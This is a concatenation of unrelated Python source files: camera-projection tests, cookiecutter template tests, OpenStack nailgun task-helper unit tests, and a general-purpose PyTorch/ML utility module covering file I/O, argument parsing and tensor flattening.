eye, lookat, up = cam_orig.get_view()
eye2, lookat2, up2 = cam_flip.get_view()
assert not np.allclose( lookat, lookat2 )
# but they project 3D points to same pixel locations
verts = np.array([[ 0.042306, 0.015338, 0.036328],
[ 1.03323, 2.030344, 3.041542],
[ 0.03323, 0.030344, 0.041542],
[ 0.036396, 0.026464, 0.052408]])
expected = cam_orig.project_3d_to_pixel(verts)
actual = cam_flip.project_3d_to_pixel(verts)
assert np.allclose( expected, actual )
def test_view():
all_options = get_default_options()
for opts in all_options:
yield check_view, opts
def check_view(cam_opts):
"""check that we can reset camera extrinsic parameters"""
# This is not a very good test. (Should maybe check more eye
# positions, more lookat directions, and more up vectors.)
cam_orig = _build_test_camera(**cam_opts)
eye = (10,20,30)
lookat = (11,20,30) # lookat - eye must be a unit vector for the checks below to hold
up = (0,-1,0)
cam_new = cam_orig.get_view_camera(eye, lookat, up)
eye2, lookat2, up2 = cam_new.get_view()
assert np.allclose( eye, eye2)
assert np.allclose( lookat, lookat2 )
assert np.allclose( up, up2 )
# check a case that was previously failing
n=6
x = np.linspace(0, 2*n, n)
theta = np.linspace(0, 2*np.pi, n)
dim = 5.0
for i in range(n):
center = np.array( (x[i], 0.0, dim) )
lookat = center + np.array( (0,1,0))
up = -np.sin(theta[i]), 0, np.cos(theta[i])
cam_new2 = cam_orig.get_view_camera(eye=center, lookat=lookat)
# check a pathological case
center= [ 0., 0., 5.]
lookat= [ 0., 1., 5.]
up = [0,-1,0]
try:
cam_new3 = cam_orig.get_view_camera(eye=center, lookat=lookat, up=up)
except AssertionError as err:
# we should get this exception
pass
else:
assert False, "expected AssertionError was not raised"
def test_camcenter():
"""check that our idea of camera center is theoretically expected value"""
all_options = get_default_options()
for opts in all_options:
cam = _build_test_camera(**opts)
assert np.allclose( cam.get_camcenter(), cam.get_t_inv().T )
def test_stages():
all_options = get_default_options()
for distorted in (True,False):
for opts in all_options:
yield check_stages, opts, distorted
def check_stages(cam_opts, distorted=False):
"""check the sum of all stages equals all stages summed"""
cam = _build_test_camera(**cam_opts)
uv_raw = _generate_uv_raw(cam.width, cam.height)
pts3d = cam.project_pixel_to_3d_ray( uv_raw, distorted=distorted )
# case 1: direct projection to pixels
direct = cam.project_3d_to_pixel( pts3d, distorted=distorted )
# case 2: project to camera frame, then to pixels
cam_frame = cam.project_3d_to_camera_frame(pts3d)
indirect = cam.project_camera_frame_to_pixel(cam_frame, distorted=distorted)
assert np.allclose(direct, indirect)
def test_simple_camera():
center = np.array( (0, 0.0, 5) )
lookat = center + np.array( (0,1,0))
cam = CameraModel.load_camera_simple(fov_x_degrees=90,
eye=center,
lookat=lookat)
def test_equality():
center = np.array( (0, 0.0, 5) )
lookat = center + np.array( (0,1,0))
cam_apple1 = CameraModel.load_camera_simple(fov_x_degrees=90,
eye=center,
lookat=lookat,
name='apple')
cam_apple2 = CameraModel.load_camera_simple(fov_x_degrees=90,
eye=center,
lookat=lookat,
name='apple')
cam_orange = CameraModel.load_camera_simple(fov_x_degrees=30,
eye=center,
lookat=lookat,
name='orange')
assert cam_apple1==cam_apple2
assert cam_apple1!=cam_orange
assert not cam_apple1==cam_orange
def test_pickle_roundtrip():
all_options = get_default_options()
for opts in all_options:
yield check_pickle_roundtrip, opts
def check_pickle_roundtrip(cam_opts):
cam = _build_test_camera(**cam_opts)
buf = pickle.dumps(cam)
cam2 = pickle.loads(buf)
assert cam==cam2
def test_camcenter_like():
all_options = get_default_options()
for opts in all_options:
yield check_camcenter_like, opts
def check_camcenter_like(cam_opts):
cam = _build_test_camera(**cam_opts)
cc_expected = cam.get_camcenter()
for n in range(4):
nparr = np.zeros( (n,3), dtype=float )  # `np.float` was removed in NumPy 1.24; plain `float` is equivalent
cc = cam.camcenter_like( nparr )
for i in range(n):
this_cc = cc[i]
assert np.allclose(cc_expected,this_cc)
|
from sphinx.cmd.build import main
from typing import Dict
import pytest
import re
@pytest.mark.parametrize("test_input_repository_hosting_platform", ["GitHub", "GitLab"])
@pytest.mark.parametrize("test_input_project_name", ["A project", "Another project"])
@pytest.mark.parametrize("test_input_using_r", ["Yes", "No"])
def test_request_template_generated_correctly(
cookies,
test_input_repository_hosting_platform: str,
test_input_project_name: str,
test_input_using_r: str,
) -> None:
"""Test the pull or merge request templates are created correctly."""
# Create a new project adding extra context; return its `project_path` attribute
test_output_project = cookies.bake(
extra_context={
"repository_hosting_platform": test_input_repository_hosting_platform,
"project_name": test_input_project_name,
"using_R": test_input_using_r,
}
)
# Check that the build passes
assert test_output_project.exit_code == 0
assert test_output_project.exception is None
# Define the path to the pull or merge request template
test_output = test_output_project.project_path
if test_input_repository_hosting_platform == "GitHub":
assert test_output.joinpath(".github", "pull_request_template.md").is_file()
elif test_input_repository_hosting_platform == "GitLab":
assert test_output.joinpath(
".gitlab", "merge_request_templates", f"{test_input_project_name}.md"
).is_file()
else:
pytest.fail(
"Unknown `repository_hosting_platform` value: "
f"{test_input_repository_hosting_platform}"
)
@pytest.mark.skip(
reason="Unclear how to test this, unless there is a title in each " "framework"
)
def test_organisational_framework_correct() -> None:
"""Test that the correct organisational framework is built."""
pass
@pytest.mark.parametrize("test_input_repository_name", ["a", "b"])
@pytest.mark.parametrize("test_input_using_r", ["Yes", "No"])
def test_repo_name_directory_correct(
cookies, test_input_repository_name: str, test_input_using_r: str
) -> None:
"""Check the project repository is generated with the correct name."""
# Create a new project adding extra context
test_output_project = cookies.bake(
extra_context={
"repo_name": test_input_repository_name,
"using_R": test_input_using_r,
}
)
# Check that the build passes
assert test_output_project.exit_code == 0
assert test_output_project.exception is None
# Check that the repository name is correct, and it is a directory
assert test_output_project.project_path.name == test_input_repository_name
assert test_output_project.project_path.is_dir()
# Define the test cases for the `test_builds_correctly` test
args_builds_correctly = [
{
"organisation_name": "org_1",
"organisation_handle": "handle_1",
"contact_email": "email@1",
"project_name": "Project_1",
"repo_name": "repo_1",
"overview": "overview_1",
"project_version": "version_1",
},
{
"organisation_name": "org_2",
"organisation_handle": "handle_2",
"contact_email": "email@2",
"project_name": "Project_2",
"repo_name": "repo_2",
"overview": "overview_2",
"project_version": "version_2",
},
]
@pytest.mark.parametrize("test_input_context", args_builds_correctly)
@pytest.mark.parametrize("test_input_repository_hosting_platform", ["GitHub", "GitLab"])
@pytest.mark.parametrize("test_input_organisational_framework", ["GDS", "N/A"])
@pytest.mark.parametrize("test_input_using_r", ["No", "Yes"])
def test_builds_correctly(
cookies,
test_input_context: Dict[str, str],
test_input_repository_hosting_platform: str,
test_input_organisational_framework: str,
test_input_using_r: str,
) -> None:
"""Test that the projects are built correctly with no errors."""
# Create a new project adding extra context
test_output_project = cookies.bake(
extra_context={
**test_input_context,
"repository_hosting_platform": test_input_repository_hosting_platform,
"organisational_framework": test_input_organisational_framework,
"using_R": test_input_using_r,
}
)
# Check that the build passes
assert test_output_project.exit_code == 0
assert test_output_project.exception is None
# Check there are no `cookiecutter.variable_name` entries in any file
all_files = [f for f in test_output_project.project_path.rglob("*") if f.is_file()]
for file in all_files:
try:
with open(file, encoding="utf-8") as f:
assert re.search(r"{+ ?cookiecutter\.\w+ ?}+", f.read()) is None
except UnicodeDecodeError:
continue
# Test that the documentation builds as expected, and then for broken links
test_output_project_docs_folder = test_output_project.project_path.joinpath("docs")
assert (
main(
[
"-b",
"html",
str(test_output_project_docs_folder),
str(test_output_project_docs_folder.joinpath("_build")),
]
)
== 0
)
assert (
main(
[
"-b",
"linkcheck",
str(test_output_project_docs_folder),
str(test_output_project_docs_folder.joinpath("_linkcheck")),
]
)
== 0
)
|
# -*- coding: utf-8 -*-
# Copyright 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import web
from nailgun.db.sqlalchemy.models import Cluster
from nailgun.db.sqlalchemy.models import Task
from nailgun import objects
from nailgun.orchestrator.deployment_serializers \
import DeploymentHASerializer
from nailgun.task.helpers import TaskHelper
from nailgun.test.base import BaseTestCase
class TestTaskHelpers(BaseTestCase):
def create_env(self, nodes):
cluster = self.env.create(
nodes_kwargs=nodes)
cluster_db = self.db.query(Cluster).get(cluster['id'])
objects.NodeCollection.prepare_for_deployment(cluster_db.nodes)
self.db.flush()
return cluster_db
@property
def serializer(self):
return DeploymentHASerializer
def filter_by_role(self, nodes, role):
return [node for node in nodes if role in node.all_roles]  # a list, so len() also works on Python 3
def test_redeploy_all_controller_if_single_controller_failed(self):
cluster = self.create_env([
{'roles': ['controller'], 'status': 'error'},
{'roles': ['controller']},
{'roles': ['controller', 'cinder']},
{'roles': ['compute', 'cinder']},
{'roles': ['compute']},
{'roles': ['cinder']}])
nodes = TaskHelper.nodes_to_deploy(cluster)
self.assertEqual(len(nodes), 3)
controllers = self.filter_by_role(nodes, 'controller')
self.assertEqual(len(controllers), 3)
def test_redeploy_only_compute_cinder(self):
cluster = self.create_env([
{'roles': ['controller']},
{'roles': ['controller']},
{'roles': ['controller', 'cinder']},
{'roles': ['compute', 'cinder']},
{'roles': ['compute'], 'status': 'error'},
{'roles': ['cinder'], 'status': 'error'}])
nodes = TaskHelper.nodes_to_deploy(cluster)
self.assertEqual(len(nodes), 2)
cinders = self.filter_by_role(nodes, 'cinder')
self.assertEqual(len(cinders), 1)
computes = self.filter_by_role(nodes, 'compute')
self.assertEqual(len(computes), 1)
def test_redeploy_all_controller_and_compute_cinder(self):
cluster = self.create_env([
{'roles': ['controller'], 'status': 'error'},
{'roles': ['controller']},
{'roles': ['controller', 'cinder']},
{'roles': ['compute', 'cinder']},
{'roles': ['compute'], 'status': 'error'},
{'roles': ['cinder'], 'status': 'error'}])
nodes = TaskHelper.nodes_to_deploy(cluster)
self.assertEqual(len(nodes), 5)
controllers = self.filter_by_role(nodes, 'controller')
self.assertEqual(len(controllers), 3)
cinders = self.filter_by_role(nodes, 'cinder')
self.assertEqual(len(cinders), 2)
computes = self.filter_by_role(nodes, 'compute')
self.assertEqual(len(computes), 1)
def test_redeploy_with_critial_roles(self):
cluster = self.create_env([
{'roles': ['controller'], 'status': 'error'},
{'roles': ['controller'], 'status': 'provisioned'},
{'roles': ['controller'], 'status': 'provisioned'},
{'roles': ['compute', 'cinder'], 'status': 'provisioned'},
{'roles': ['compute'], 'status': 'provisioned'},
{'roles': ['cinder'], 'status': 'provisioned'}])
nodes = TaskHelper.nodes_to_deploy(cluster)
self.assertEqual(len(nodes), 6)
controllers = self.filter_by_role(nodes, 'controller')
self.assertEqual(len(controllers), 3)
cinders = self.filter_by_role(nodes, 'cinder')
self.assertEqual(len(cinders), 2)
computes = self.filter_by_role(nodes, 'compute')
self.assertEqual(len(computes), 2)
# TODO(aroma): move it to utils testing code
def test_recalculate_deployment_task_progress(self):
cluster = self.create_env([
{'roles': ['controller'],
'status': 'provisioned',
'progress': 100},
{'roles': ['compute'],
'status': 'deploying',
'progress': 100},
{'roles': ['compute'],
'status': 'ready',
'progress': 0},
{'roles': ['compute'],
'status': 'discover',
'progress': 0}])
task = Task(name='deploy', cluster_id=cluster.id)
self.db.add(task)
self.db.commit()
progress = TaskHelper.recalculate_deployment_task_progress(task)
self.assertEqual(progress, 25)
# TODO(aroma): move it to utils testing code
def test_recalculate_provisioning_task_progress(self):
cluster = self.create_env([
{'roles': ['controller'],
'status': 'provisioned',
'progress': 100},
{'roles': ['compute'],
'status': 'provisioning',
'progress': 0}])
task = Task(name='provision', cluster_id=cluster.id)
self.db.add(task)
self.db.commit()
progress = TaskHelper.recalculate_provisioning_task_progress(task)
self.assertEqual(progress, 50)
def test_get_task_cache(self):
expected = {"key": "value"}
task = Task()
task.cache = expected
self.db.add(task)
self.db.flush()
actual = TaskHelper.get_task_cache(task)
self.assertDictEqual(expected, actual)
task_from_db = objects.Task.get_by_uuid(task.uuid)
self.db.delete(task_from_db)
self.db.flush()
expected = {}
actual = TaskHelper.get_task_cache(task)
self.assertDictEqual(expected, actual)
def test_prepare_action_log_kwargs_with_web_ctx(self):
self.env.create(
nodes_kwargs=[
{'roles': ['compute'], 'provisioning': True},
]
)
cluster = self.env.clusters[0]
task = Task(name='provision', cluster_id=cluster.id)
self.db.add(task)
self.db.flush()
actor_id = 'xx'
with mock.patch.dict(web.ctx,
{'env': {'fuel.action.actor_id': actor_id}}):
kwargs = TaskHelper.prepare_action_log_kwargs(task)
self.assertIn('actor_id', kwargs)
self.assertEqual(actor_id, kwargs['actor_id'])
with mock.patch.dict(web.ctx, {'env': {}}):
kwargs = TaskHelper.prepare_action_log_kwargs(task)
self.assertIn('actor_id', kwargs)
self.assertIsNone(kwargs['actor_id'])
def test_prepare_action_log_kwargs_without_web_ctx(self):
self.env.create(
nodes_kwargs=[
{'roles': ['compute'], 'pending_addition': True},
{'roles': ['controller'], 'pending_addition': True},
]
)
cluster = self.env.clusters[0]
deployment_task = Task(name='deployment', cluster_id=cluster.id)
self.db.add(deployment_task)
self.db.flush()
# Checking with task without parent
kwargs = TaskHelper.prepare_action_log_kwargs(deployment_task)
self.assertIn('actor_id', kwargs)
self.assertIsNone(kwargs['actor_id'])
# Checking with empty actor_id in ActionLog
al_kwargs = TaskHelper.prepare_action_log_kwargs(deployment_task)
al = objects.ActionLog.create(al_kwargs)
check_task = Task(name='check_before_deployment',
cluster_id=cluster.id,
parent_id=deployment_task.id)
self.db.add(check_task)
self.db.flush()
kwargs = TaskHelper.prepare_action_log_kwargs(check_task)
self.assertIn('actor_id', kwargs)
self.assertIsNone(kwargs['actor_id'])
# Checking with actor_id is not None in ActionLog
actor_id = 'xx'
al.actor_id = actor_id
self.db.flush()
kwargs = TaskHelper.prepare_action_log_kwargs(check_task)
self.assertIn('actor_id', kwargs)
self.assertEqual(actor_id, kwargs['actor_id'])
|
"""All-purpose utility file with helpers for
- PyTorch tensor processing (flattening, unflattening, vjp, jvp),
- plotting,
- custom gradient checking (gradient wrt parameters, and second-order gradients),
- meters (ema, online average),
- custom learning rate schedules,
- ema model averaging,
- google cloud storage utilities,
- custom context managers (Timer, DisableGC),
- checkpoint storage/loading,
- data loaders, and
- misc log sanitization.
"""
import abc
import argparse
import collections
import contextlib
import copy
import csv
import datetime
import gc
import io
import json
import logging
import math
import os
import random
import shutil
import signal
import sys
import time
from typing import Callable, Dict, Iterator, List, Optional, Sequence, Tuple, Union
import warnings
import numpy as np
import requests
from scipy import stats
import six
import torch
from torch import nn, optim
import torch.nn.functional as F
from torch.utils import data
import tqdm
# Misc.
home = os.path.expanduser("~")
home_data = os.path.join(home, 'data')
join = os.path.join
pathexists = os.path.exists
makedirs = os.makedirs
dirname = os.path.dirname
def set_trace():
import pdb
pdb.set_trace()
def float2str(x, precision=8):
return f"{x:.{precision}f}".replace('.', "_")
def int2str(x, leading_zeros=8):
return f"{x:0{leading_zeros}d}"
def average_over_seed(seq_of_seq):
min_len = min(len(seq) for seq in seq_of_seq)
seq_of_seq = [seq[:min_len] for seq in seq_of_seq]
seq_of_seq = np.array(seq_of_seq)
return seq_of_seq.mean(0), seq_of_seq.std(0)
def single_standard_deviation(sample, return_type="tuple"):
if return_type == "tuple":
return np.mean(sample), np.std(sample)
elif return_type == "dict":
return dict(mean=np.mean(sample), delta=np.std(sample))
else:
raise ValueError(f"Unknown return_type: {return_type}")
def confidence_interval(sample, alpha=0.05):
"""Compute (asymptotic) confidence interval under the normality assumption.
Assumes each sample is drawn from a normal distribution.
This could still work if you have a large number of samples.
"""
alpha2zscore = {
0.01: 2.58,
0.02: 2.33,
0.05: 1.960,
0.1: 1.645,
0.15: 1.440,
}
if isinstance(sample, (list, tuple)):
sample = torch.tensor(sample)
sample: torch.Tensor
if not sample.dim() == 1:
raise ValueError(f"`sample` must be 1-dimensional.")
sample_size = len(sample)
sample_mean = sample.mean()
sample_std = sample.std(unbiased=False)
zscore = alpha2zscore[alpha]
delta = zscore * sample_std / math.sqrt(sample_size)
low = sample_mean - delta
high = sample_mean + delta
return dict(low=low, high=high, delta=delta, mean=sample_mean)
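# Illustrative usage sketch (not part of the original utilities); the helper name
# `_example_confidence_interval` is ours. It checks the interval against the
# textbook formula mean +/- z * std / sqrt(n).
def _example_confidence_interval():
    sample = torch.tensor([1.0, 2.0, 3.0, 4.0, 5.0])
    ci = confidence_interval(sample, alpha=0.05)
    expected_delta = 1.960 * sample.std(unbiased=False) / math.sqrt(len(sample))
    assert torch.isclose(ci["delta"], expected_delta)
    return ci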
def jdump(obj: Union[str, dict, list], f: str, mode="w", indent=4, to_gcs=False, default=None):
"""Dump a str or dictionary to a file in json format.
Args:
obj: An object to be written.
f: A string path to the location on disk.
mode: Mode for opening the file.
indent: Indent for storing json dictionaries.
to_gcs: Upload the file to cloud storage.
default: A function to handle non-serializable entries; defaults to `None`.
Returns:
None.
"""
os.makedirs(os.path.dirname(f), exist_ok=True)
with open(f, mode=mode) as file:
if isinstance(obj, (dict, list)):
json.dump(obj, file, indent=indent, default=default)
elif isinstance(obj, str):
file.write(obj)
else:
raise ValueError(f'Unexpected type: {type(obj)}')
if to_gcs:
gs_upload_from_path(f)
logging.warning(f"Uploading to gcs: {f}")
def jdumps(obj, indent=4):
return json.dumps(obj, indent=indent)
def jload(f: Union[str, io.IOBase], mode="r"):
"""Load a .json file into a dictionary."""
if not isinstance(f, io.IOBase):
f = open(f, mode=mode)
jdict = json.load(f)
f.close()
return jdict
def read_csv(f: Union[str, io.IOBase], mode="r", delimiter='\t'):
if not isinstance(f, io.IOBase):
f = open(f, mode=mode)
reader = csv.DictReader(f, delimiter=delimiter)
out = dict(
fieldnames=reader.fieldnames,
rows=tuple(line for line in reader)
)
f.close()
return out
def write_csv(
f: str,
fieldnames: Union[List, Tuple],
rows: Union[Tuple, List], # Each line is a list with corresponding columns.
mode="w",
delimiter='\t'
):
os.makedirs(os.path.dirname(f), exist_ok=True)
f = open(f, mode=mode)
writer = csv.writer(f, delimiter=delimiter)
writer.writerow(fieldnames)
for row in rows:
writer.writerow(row)
f.close()
def readlines(f: Union[str, io.IOBase], mode="r", strip=True):
if not isinstance(f, io.IOBase):
f = open(f, mode=mode)
lines = f.readlines()
if strip:
lines = [line.strip() for line in lines]
f.close()
return lines
def listdir(directory, skip_suffixes: Union[Sequence, str] = (), full_path: Optional[bool] = False):
"""Convenience function to replace `os.listdir` for skipping annoying mac hidden files."""
if isinstance(skip_suffixes, str):
skip_suffixes = (skip_suffixes,)
skip_suffixes = tuple(skip_suffixes) + (".DS_Store",)
file_names = os.listdir(directory)
for skip_suffix in skip_suffixes:
file_names = [file_name for file_name in file_names if not file_name.endswith(skip_suffix)]
if full_path:
file_names = [os.path.join(directory, file_name) for file_name in file_names]
return file_names
def list_file_paths(directory, skip_suffixes: Union[Sequence, str] = ()):
"""Recursively go down the folder, list only files, and returns paths."""
if isinstance(skip_suffixes, str):
skip_suffixes = (skip_suffixes,)
skip_suffixes = tuple(skip_suffixes) + (".DS_Store",)
file_paths = [os.path.join(root, file) for root, dirs, files in os.walk(directory) for file in files]
for suffix in skip_suffixes:
file_paths = [file_path for file_path in file_paths if not file_path.endswith(suffix)]
return file_paths
# Backwards compat.
listfiles = list_file_paths
def listfds():
"""List all open file descriptors."""
return sorted(list(set(os.listdir('/proc/self/fd/'))))
def compress(path: str, out_path: Optional[str] = None):
"""Compress a file or folder; relies on `pigz`, a Linux utility.
Args:
path: Path to the file or folder to compress.
out_path: Path to the compressed file; defaults to the original path with the suffix `tar.gz` added.
Returns:
None.
"""
if out_path is None:
out_path = path + ".tar.gz"
with Timer(msg=f"Compressed file/folder: {path}", logging=True):
os.system(f"tar cf - {path} | pigz -9 > {out_path}")
def decompress(path: str, out_path: Optional[str] = None):
"""Decompress a file or a folder; relies on `pigz`, a Linux utility with multi-threading.
Args:
path (str): Path to file/folder to be decompressed.
out_path (str): Path to the folder for the decompressed output; defaults to `None`, meaning the current directory.
"""
with Timer(msg=f"Decompressed file: {path}", logging=True):
if out_path is not None:
os.system(f"tar -I pigz -xf {path} -C {out_path}")
else:
os.system(f"tar -I pigz -xf {path}")
def alleq(l: Sequence, f: Optional[Callable] = lambda x, y: x == y):
"""Check all arguments in a sequence are equal according to a given criterion.
Args:
f: A bi-variate boolean function.
l: A list/tuple.
Returns:
True if everything is equal; otherwise False.
"""
return all(f(l[0], li) for li in l[1:])
def zip_(*args: Sequence):
"""Assert sequences of same length before zipping."""
if len(args) == 0: return []
assert alleq(args, lambda x, y: len(x) == len(y))
return zip(*args)
def write_config(args: argparse.Namespace, file_name='argparse.json', config_path=None, attr="train_dir"):
"""Creates folders and write config.
Doesn't write if in `eval` mode.
"""
if not hasattr(args, attr):
return
train_dir = getattr(args, attr)
if train_dir is None:
return
os.makedirs(train_dir, exist_ok=True)
if config_path is None:
config_path = os.path.join(train_dir, file_name)
os.makedirs(os.path.dirname(config_path), exist_ok=True)
with open(config_path, 'w') as f:
json.dump(args.__dict__, f, indent=4)
logging.warning(f"Wrote config: {config_path}")
if ((hasattr(args, 'cloud_storage') and args.cloud_storage) or
(hasattr(args, 'to_gcs') and args.to_gcs)):
gs_upload_from_path(config_path, remove_local=False)
logging.warning(f"Uploaded to cloud: {config_path}")
def load_config(args: argparse.Namespace, file_name='argparse.json', config_path=None, replace_exclude=()):
if config_path is None:
config_path = os.path.join(args.train_dir, file_name)
with open(config_path, 'r') as f:
config = json.load(f)
for key in replace_exclude:
config.pop(key, None)
args.__dict__ = {**args.__dict__, **config}
def str2bool(v):
if isinstance(v, bool): return v
if v.lower() in ('yes', 'true', 't', 'y', '1'): return True
if v.lower() in ('no', 'false', 'f', 'n', '0'): return False
raise argparse.ArgumentTypeError('Boolean value expected.')
def str2int(v):
if isinstance(v, int): return v
if v.lower() in ("none",): return None
return int(v)
def gather_args(parser: argparse.ArgumentParser):
"""Gathers known and unknown args together.
Unknown args are arguments whose names we don't know beforehand and which aren't declared via `add_argument`.
"""
args, unknown_args = parser.parse_known_args()
unknown_options = collections.defaultdict(list)
key = None
for arg in unknown_args:
if arg.startswith('--'):
key = arg[2:]
elif arg.startswith('-'):
key = arg[1:]
else:
unknown_options[key].append(arg)
args.__dict__ = {**args.__dict__, **unknown_options}
return args
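# Illustrative usage sketch (not part of the original utilities): parse a command
# line containing an option that was never declared via `add_argument`. The flag
# names below are hypothetical.
def _example_gather_args():
    parser = argparse.ArgumentParser()
    parser.add_argument('--lr', type=float, default=1e-3)
    old_argv = sys.argv
    try:
        sys.argv = [old_argv[0], '--lr', '0.1', '--optimizer', 'adam']
        args = gather_args(parser)
    finally:
        sys.argv = old_argv
    # `lr` is parsed normally; the undeclared `optimizer` ends up as ['adam'].
    return args.lr, args.__dict__['optimizer']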
def flatten_nested_pystruct(sequence: Sequence):
"""Flatten nested python list/tuple/set and return a list of elements."""
if not isinstance(sequence, (tuple, list, set)):
return [sequence]
return [i for entry in sequence for i in flatten_nested_pystruct(entry)]
def parallel_sort(*args, key=None, reverse=False):
"""Parallel sort of multiple lists."""
# args: A bunch of sequences.
if key is None: key = lambda inputs: inputs[0] # Parallel sort based on the order of the first list.
ret = sorted(zip_(*args), key=key, reverse=reverse)
return tuple([ret_i[j] for ret_i in ret] for j in range(len(args)))
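# Illustrative usage sketch (not part of the original utilities): sort scores and
# labels together, ordered by score.
def _example_parallel_sort():
    scores, labels = [0.3, 0.9, 0.1], ['b', 'c', 'a']
    sorted_scores, sorted_labels = parallel_sort(scores, labels)
    assert sorted_scores == [0.1, 0.3, 0.9]
    assert sorted_labels == ['a', 'b', 'c']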
def linregress_slope(x, y):
"""Return the slope of a least-squares regression for two sets of measurements."""
return stats.linregress(x, y)[0]
def pretty_str(names: Sequence, vars: Sequence, precision: Optional[int] = 4):
ret = ""
for name, var in zip(names[:-1], vars[:-1]):
if isinstance(var, float):
ret += f"{name}: {var:.{precision}f}, "
else:
ret += f"{name}: {var}, "
ret += f"{names[-1]}: {vars[-1]}" # No comma after last.
return ret
class _SuppressAssertions(object):
def __init__(self, tqdm_range):
self.tqdm_range = tqdm_range
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is AssertionError:
self.tqdm_range.write('Caught AssertionError: ' + str(exc_val))
return True
def show_env(args_or_device=None):
if args_or_device is not None:
if hasattr(args_or_device, "device"):
args_or_device = args_or_device.device
elif hasattr(args_or_device, "no_gpu"):
args_or_device = "cuda" if torch.cuda.is_available() and not args_or_device.no_gpu else "cpu"
logging.warning(f"Running on device: {args_or_device}")
logging.warning(f"CUDA device count: {torch.cuda.device_count()}")
logging.warning(f"Running Python: \n{sys.version}; \nversion info: \n{sys.version_info}")
logging.warning(f"Running PyTorch: {torch.__version__}")
logging.warning(f"Running six: {six.__version__}")
def download_file_from_google_drive(id, destination, timeout=120):
"""Download a file hosted on Google drive with the id extracted from a sharable link."""
def get_confirm_token(response):
for key, value in response.cookies.items():
if key.startswith('download_warning'):
return value
return None
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in tqdm.tqdm(response.iter_content(CHUNK_SIZE), desc="chunks"):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
URL = "https://docs.google.com/uc?export=download"
session = requests.Session()
response = session.get(URL, params={'id': id}, stream=True, timeout=timeout)
token = get_confirm_token(response)
if token:
params = {'id': id, 'confirm': token}
response = session.get(URL, params=params, stream=True, timeout=timeout)
os.makedirs(os.path.dirname(destination), exist_ok=True)
save_response_content(response, destination)
def isdigit(x):
if len(x) > 0 and x[0] in ('-', '+'):
return x[1:].isdigit()
return x.isdigit()
class Timeout(contextlib.ContextDecorator):
def __init__(self, seconds: Union[float, int], error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message) # This doesn't work in Py2.
def __enter__(self):
signal.signal(signal.SIGALRM, self.handle_timeout) # Create custom handler for SIGALRM.
# `signal.ITIMER_REAL` will deliver SIGALRM in `self.seconds`.
# Better than directly sending SIGALRM, which doesn't allow floating-point seconds.
signal.setitimer(signal.ITIMER_REAL, self.seconds)
def __exit__(self, exc_type, exc_val, exc_tb):
signal.alarm(0) # Cancel the previously set alarm if haven't timed out.
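# Illustrative usage sketch (not part of the original utilities): abort a slow call
# after half a second. Relies on SIGALRM, so it only works in the main thread on Unix.
def _example_timeout():
    try:
        with Timeout(seconds=0.5):
            time.sleep(2)  # Would block for 2 seconds without the alarm.
    except TimeoutError:
        return "timed out"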
def rm(*paths: str):
"""Remove path or directory specified at path."""
for path in paths:
if not os.path.exists(path):
continue
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
def deduplicate(x: Union[List, Tuple]):
"""Remove duplicates in a list or tuple; preserves original order."""
return type(x)(dict.fromkeys(x))
def mvdir(src: str, tgt: str, tmp: str):
"""Move source directory to target directory.
Most helpful when you want to insert a subdirectory into a path, e.g.,
moving /home/path -> /home/path/sub.
Note naive `mv` does not work for this case!
"""
os.system(f'mv {src} {tmp}')
os.system(f'mkdir -p {tgt}')
os.system(f'mv {tmp}/* {tgt}')
os.system(f'rm -r {tmp}')
def handle_unused_kwargs(unused_kwargs, msg=None):
if len(unused_kwargs) > 0:
if msg is not None:
warnings.warn(f"{msg}: Unexpected arguments {unused_kwargs}")
else:
warnings.warn(f"Unexpected arguments {unused_kwargs}")
class ContainerMeta(type):
def all(cls):
return sorted(getattr(cls, x) for x in dir(cls) if not x.startswith('__'))
def __str__(cls):
return str(cls.all())
def __contains__(cls, item):
return item in cls.all()
def runs_tasks(
task: str,
task_names: Sequence[str],
task_callables: Sequence[Callable],
**kwargs,
):
for task_name, task_callable in zip_(task_names, task_callables):
if task == task_name:
return task_callable(**kwargs)
raise ValueError(f"Unknown task: {task}. Expected one of {task_names}")
# Torch.
def tsave(state_dicts: dict, path: str):
makedirs(dirname(path), exist_ok=True)
torch.save(state_dicts, path)
def collect_tensors(verbose=False):
"""Collect all referenced tensors; useful for debugging memory leak."""
count = 0
for obj in gc.get_objects():
try:
if torch.is_tensor(obj) or (hasattr(obj, 'data') and torch.is_tensor(obj.data)):
if verbose:
print(type(obj), obj.size())
count += 1
except Exception:
pass
logging.warning(f'Total number of tensors: {count}')
def log_shape(*args):
for i, arg in enumerate(args):
logging.warning(f'tensor {i}, shape: {arg.shape}')
def flatten(possibly_sequence: Union[torch.Tensor, Sequence[torch.Tensor]]):
if torch.is_tensor(possibly_sequence): return possibly_sequence.reshape(-1)
return torch.cat([p.reshape(-1) for p in possibly_sequence]) if len(possibly_sequence) > 0 else torch.tensor([])
def flatten_nested(possibly_sequence: Union[torch.Tensor, Sequence]):
if torch.is_tensor(possibly_sequence): return possibly_sequence.reshape(-1)
flat_tensors = [flatten_nested(entry) for entry in possibly_sequence]
return torch.cat(flat_tensors, dim=0) if len(flat_tensors) > 0 else torch.tensor([])
def ravel_pytree(possibly_sequence: Union[Sequence, torch.Tensor]) -> Tuple[torch.Tensor, Callable]:
if torch.is_tensor(possibly_sequence):
return possibly_sequence.reshape(-1), lambda x: x.reshape(possibly_sequence.size())
def make_unravel(size):  # Closure so each unravel captures its own size.
return lambda x: x.reshape(size)
unravels, flats, numels = [], [], []
for entry in possibly_sequence:
if torch.is_tensor(entry):
unravel_i = make_unravel(entry.size())
flat_i = entry.reshape(-1)
else:
flat_i, unravel_i = ravel_pytree(entry)
unravels.append(unravel_i)
flats.append(flat_i)
numels.append(flat_i.numel())
def unravel(flat: torch.Tensor):
return [unravel_(flat_) for flat_, unravel_ in zip_(flat.split(split_size=numels), unravels)]
return torch.cat(flats) if len(flats) > 0 else torch.tensor([]), unravel
